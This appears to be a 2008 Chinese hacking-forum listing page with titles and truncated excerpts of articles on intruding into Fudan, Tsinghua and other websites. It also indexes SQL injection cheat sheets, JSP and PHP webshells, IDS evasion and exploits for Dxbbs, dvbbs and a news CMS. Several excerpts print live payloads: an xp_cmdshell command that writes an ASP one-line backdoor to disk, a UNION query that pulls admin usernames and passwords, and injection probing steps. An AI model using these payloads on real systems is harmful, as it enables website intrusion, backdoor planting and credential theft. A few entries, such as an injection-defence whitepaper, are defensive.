入侵复旦大学网站
此文章已发表在《黑客X档案》第6期杂志上后经本文作者hackest提交到HST技术论坛欢迎大家转载,但请务必要记住注明此信息!一、师出有名 某日十分无聊,就和X论坛的超级版主wyzhack瞎吹牛,东年西扯的。后来不知道怎么的扯到复旦去了,他...
编辑:2008-12-18 01:24:51
入侵清华大学网站全过程
本文已发表于《黑客手册》第六期,转载请注明版权 ,本人此次纯属友情检测,没有对任何服务器造成伤害。文章涉及服务器已经全部打好补丁。请大家不要按图索骥,中国教育网络是脆弱的,请大家不要在给脆弱的心灵增加不必要的伤害 !自上次偶利用ewebed...
编辑:2008-12-18 01:24:04
对某高级技工学校网站的安全检测和加固
今天发现的是一所技工学校,先对其进行安全检测,然后对其出现漏洞的地方进行了防范,下面将漏洞挖掘、分析和修补过程写出来跟大家分享。
(一)漏洞挖掘
1.获取初步信息
某天simeon在群里发了一个IP地址,让众兄弟们看看看看网站安全性如何,说是有奖励。(某人偷笑...
编辑:2008-12-18 01:23:14
入侵检测PHP程序中的目录遍历漏洞
目录遍历漏洞在国内外有许多不同的叫法,比如也可以叫做信息泄露漏洞,非授权文件包含漏洞.名称虽然多,可他们却有一个共同的成因,就是在程序中没有过滤用户输入的../和./之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件,其危害可想而知....
编辑:2008-12-05 08:47:42
Jsp一句话经典后门收藏
java是 面向对象编程的语言了! 啥都是对象!基于编译与解析之间~~-_- ... 估计没有eval execute这样功能的函数了!...但是还是可以留一句话后门的 本来我想用反射实现 像 eval这样的功能.....但是失败了!郁闷!后来没有办法~~ 算了~~ 这样实现吧!程序代码
<...
编辑:2008-12-05 08:47:30
PHP脚本注入十点基本步骤大总结
1.判断是否存在注入,加';and 1=1;and 1=22.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于104.再利用union来查询准确字段,如: and 1=2 uni...
编辑:2008-12-05 08:47:18
一个来自国外的Phpshell--Shell
又一个来自国外的phpshell,在milw0rm看到的。关于为什么起这个名字,作者说:“Couldn't think of a name so it became "Shell I"...”phpshell不稀奇了,介绍这个phpshell主要是他有一个比较有新意的功能:md5 cracker with custom options可以直接在这个phpshell中利...
编辑:2008-12-05 08:47:05
Dxbbs论坛参数过滤不严漏洞利用(通杀7.3以前所有版本)
漏洞出现在User_Friend.aspx , 由于过滤不严,造成name允许注入, 不多说了,自己看吧。-------------------------------------------------------------------------------------------http://www.dxbbs.cn/这是DXBBS官方网站,版本是7.3,用的access数据库在User_Fr...
编辑:2008-12-05 08:46:53
SQL Injection规避入侵检测技术总结
信息来源:天马行空技术小组《SQL Injection规避入侵检测技术总结》当我们对一个运行IDS系统的服务器进行SQL注射时,我们往往会遇到很大的麻烦,因为我们的注射语句被过滤了,如何规避这种检测手段就成了一门新的技术,本文就对此规避技术提出十一条思路和方法,与大...
编辑:2008-12-05 08:46:41
经典:最详细的SQL注入相关的命令整理
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:mu.asp';--? echo ^<%execute...
编辑:2008-12-05 08:46:28
沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入利用
+ News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2
后台“图文管理”里添加文章,上传一个flas...
编辑:2008-12-05 08:46:11
Sql Injection的终极利器Opendatasource和Openrowset(图)
作者:LCX 目前市面上的SQL INECTION工具很多,最受推崇的当属NBSI了。SQL INECTION的方法在网上是也是满天飞,大家仔细学一下都会很快的成为脚本入侵高手。可是无论是工具,还是众多方法,猜SQL数据的时候原理不外乎两种。一个是对方的WEB服务器在没有关闭错误提...
编辑:2008-12-05 08:45:52
天清入侵防御系统SQL注入防御技术白皮书
背景知识 什么是SQL注入 SQL注入:利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,这是SQL注入的标准释义。 随着B/S模式被广泛的应用,用这种模式编写应用程序的程序员也越来越多,但由于开发人员的水平和经验参差不齐,相当一部...
编辑:2008-12-05 08:45:34
对偶偶娱乐分站服务器的安全检测
前些日子在家无聊,去了一些视频站看看搞笑的视频啥的,听说偶偶娱乐那个站还不错,但是打开来卡的要命,视频半天也不动,郁闷!偶然间不知道点进了哪个连接,进入了一个219.238.xxx.xxx这个地址,FLASH做的还不错,呵呵!
于是到http://www.myipneighbors.co...
编辑:2008-12-05 08:45:22
dvbbs 8.2 SQL注射漏洞
今天凌晨得到动网又出了漏洞,与和幻泉说了一下。经过这个牛人的分析其很快就将一个大站拿下于是身为菜鸟的我也不会放过这个机会就请教了他。下面先看看产生此漏洞的原因吧:login.asp 118行左右......username=trim(Dvbbs.CheckStr(request("username")))If ajaxPro Th...
编辑:2008-12-05 08:44:50
无法获得Web绝对路径又一入侵方法
我们很多情况下都遇到SQL注入可以列目录和运行命 令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
exec master.dbo.xp_cmdshell ’cscript C:InterpubAdminScriptsmkwebdir.vbs -c localhost&nbs...
编辑:2008-12-05 08:44:38
对Linux服务器四种级别入侵讲解
随着Linux企业应用的扩展,有大量的网络服务器使用Linux操作系统。Linux服务器的安全性能受到越来越多的关注,这里根据Linux服务器受到攻击的深度以级别形式列出,并提出不同的解决方案。 对Linux服务器攻击的定义是:攻击是一种旨在妨碍、损害、削弱、破坏Li...
编辑:2008-12-05 08:44:26
php注入专题
前言 Php注入攻击是现今最流行的攻击方式,依靠它强大的灵活性吸引了广大黑迷。 在上一期的《php安全与注射专题》中林.linx主要讲述了php程序的各种漏洞,也讲到了php+mysql注入的问题,可是讲的注入的问题比较少,...
编辑:2008-12-05 08:43:21
MYSQL 注射精华
MYSQL 注射精华
Tsenable
前言
鄙人今天心血来潮突然想写篇文章,鄙人从来没写过文章,如果有错误的地方请多多指教.本文需要有基础的SQL语句知识才可以更好的理解.建议想学习的人多去了解一下SQL语句和编程语言,知己知彼才能百战百胜. &n...
编辑:2008-12-05 08:43:05
对韩国某CMS的一次安全检测
打开网站后,感觉还是蛮简洁的,如图1所示,就看看它的安全性如何。
图1韩国某网站CMS界面
一、服务器信息收集
1.获取IP信息
直接打开DOS提示符操作窗口,使用ping命令,对网站www.b*******.net进行ping操作,如图2所示,获取IP地址为“221.***....
编辑:2008-12-05 08:42:34
共32页/625条
首页
1 2
3
4
5
6
7
下一页
末页
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
